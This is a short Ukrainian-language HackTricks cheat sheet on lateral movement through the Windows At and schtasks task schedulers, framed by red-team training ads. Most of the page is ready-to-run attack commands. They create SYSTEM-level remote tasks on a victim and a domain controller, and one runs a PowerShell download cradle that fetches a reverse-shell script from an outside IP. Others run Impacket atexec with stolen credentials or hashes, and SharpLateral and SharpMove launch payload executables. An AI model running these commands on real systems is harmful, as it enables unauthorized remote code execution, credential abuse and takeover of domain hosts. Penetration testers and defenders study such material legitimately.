AtExec / SchtasksExec

Reading time: 3 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Як це працює

At дозволяє планувати завдання на хостах, де ви знаєте ім'я користувача/(пароль/хеш). Отже, ви можете використовувати його для виконання команд на інших хостах і отримання виходу.

At \\victim 11:00:00PM shutdown -r

Використовуючи schtasks, спочатку потрібно створити задачу, а потім викликати її:

bash
schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>
bash
schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Ви можете використовувати Impacket's atexec.py для виконання команд на віддалених системах за допомогою команди AT. Це вимагає дійсних облікових даних (ім'я користувача та пароль або хеш) для цільової системи.

bash
atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami

Ви також можете використовувати SharpLateral:

bash
SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

Ви можете використовувати SharpMove:

bash
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password

Більше інформації про використання schtasks з silver tickets тут.

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks